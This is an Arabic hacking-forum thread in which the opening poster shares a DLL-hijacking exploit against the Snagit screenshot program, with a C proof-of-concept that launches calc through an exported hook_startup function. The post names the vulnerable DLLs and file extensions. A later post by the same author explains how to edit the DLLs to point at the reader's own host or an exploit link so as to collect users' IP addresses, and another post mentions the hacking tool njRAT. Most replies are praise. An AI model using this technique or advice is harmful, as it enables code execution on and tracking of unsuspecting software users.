1. k!lwa s&rian ro0t

    k!lwa s&rian ro0t مراقب عآم

    الأنتساب:
    ‏3 أغسطس 2014
    المشاركات:
    742
    الإعجابات المتلقاة:
    1,233
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    [​IMG]

    اليوم رح اطرح لكم ثغرة حلوة جدآ ...

    كود PHP:
    #####################################################################################################################

    #Title: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll) 

    #Author: Dmar al3noOoz  ( Ù�ارب Ø§Ù�صر Ø§Ø®Ù�Ù�Ù�ا Ù�Ù� Ø³Ù�رÙ�ا ) 

    #Mail: [email protected]

    #Software Link: http://snagit.en.softonic.com/   

    #Version: All

    #Tested on: Windows XP 

    #####################################################################################################################
    [*] Vulnerable extensions:

     /.
    snagacc  /.snagprof  /.snag

    [*] Vulnerable Dlls:

    mfc90ara.dll dwmapi.dll mfc90loc.dll

    ---------------------------------------------------------------------------------------------------------------------

    #include <windows.h>
    #define DllExport __declspec (dllexport)
     
    DllExport void hook_startup() { exp(); }
     
    int exp()
    {
      
    WinExec("calc"0);
      exit(
    0);
      return 
    0;
    }


    -=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-
    Greetz-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-  

    -=- 
    v4-team.com Evil-Cod3r dmar hacker dr.Dmar Dmaral7roOob Ra7aLAlgnob Mr.law Alkeasr20 Mr.black Cyber-CrysTaL    -=-  

    -=-                                       
    HiTMaN Team 19vr RootAl3noz all Friend Exploit4Arab.com                            -=-  

    -=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-

    طيب في ناس تقول مافهمنا شي ؟

    رح افصلك الثغرة بسناني هههههههههههههههه

    الثغرة ثغرة في برنامج Snagit للتصوير والكل يعرف هذا البرنامج واغلب الهكرز يستخدمونه ..

    ثغرة في مكتبة dll في برنامج سناجيت ..

    وكما موضح فوق
    في مكتبات الـ dll التالية .
    mfc90ara.dll
    dwmapi.dll
    mfc90loc.dll ,,,,,


    المكتبة 2 موجودة في برنامج الإختراق Njrat

    يعني يمكنك استغلالها في نجرات ايضآآ ..



    في امان الله
     
  2. TeePlow

    TeePlow V • I • P

    الأنتساب:
    ‏12 مارس 2014
    المشاركات:
    400
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    18
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    السلام عليكم
    بارك الله فيك على الطرح
    لاكن لو توضح اكثر ما عمل الثغرة
     
  3. ƁƛƬ MƛƝ

    ƁƛƬ MƛƝ V • I • P

    الأنتساب:
    ‏16 يوليو 2014
    المشاركات:
    376
    الإعجابات المتلقاة:
    13
    نقاط الجائزة:
    18
    الوظيفة:
    web development
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    شرح رائع يامبدع

    لكن لو توضح طريقة الإستغلال يكون أفضل
     
  4. ~.O M A R.~

    ~.O M A R.~ Developer

    الأنتساب:
    ‏16 يوليو 2012
    المشاركات:
    62
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    الأردن
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    مشكور يالغالي الثغره قديمه بتاريخ 2012 حق دمار العنزي
     
  5. k!lwa s&rian ro0t

    k!lwa s&rian ro0t مراقب عآم

    الأنتساب:
    ‏3 أغسطس 2014
    المشاركات:
    742
    الإعجابات المتلقاة:
    1,233
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    هذه الثغرة حق الأخ دمار العنزي ..

    صحيح هو اكتشفها ولكن ماوضح طريقة الأستغلال ..

    طيب رح اقول لكم ؟

    ^_^
    في هذه المتكبات ازا تغير فيها مالح تأثر عالبرنامج ^_^
    mfc90ara.dll
    dwmapi.dll
    mfc90loc.dll


    .....
    ازا تفتح مكتبة منهم حتلاقي بريد وحتلاقي موقع رسمي

    فيك تغير البريد لهوستك عندك او رابط استغلال وفيك تغير الموقع لموقع لديك حتى تجيب ايبيهات المستخدمين ..
    الثغرة خطيرة ياجماعة الخير ^_^

    وبارك الله فيكم جميعآ
     
  6. sєиɪσя нσssαм

    sєиɪσя нσssαм ★ Abu Nabil ★ V • I • P

    الأنتساب:
    ‏11 يوليو 2014
    المشاركات:
    202
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    18
    الإقامة:
    فــ ـي قـ ـ لـ ـ و بــ كـم
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    مآشآء الله عليك
    دآئمآ مبدع
    آستمر ولآ توقف
    ،،،
     
  7. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    احسنت اخ رامي مبدع كالعادة
    {1!$8}
     
  8. Gaza-Dz

    Gaza-Dz Support - Iq-Team

    الأنتساب:
    ‏26 مايو 2013
    المشاركات:
    1,821
    الإعجابات المتلقاة:
    87
    نقاط الجائزة:
    48
    الجنس:
    ذكر
    الوظيفة:
    DZ
    الإقامة:
    DZ
    رد: Snagit DLL Hijacking Exploit (mfc90ara.dll - dwmapi.dll - mfc90loc.dll)

    بوركت اخي رامي علي التغرة
    في انتظار كل ماهو جديدك
     

مشاركة هذه الصفحة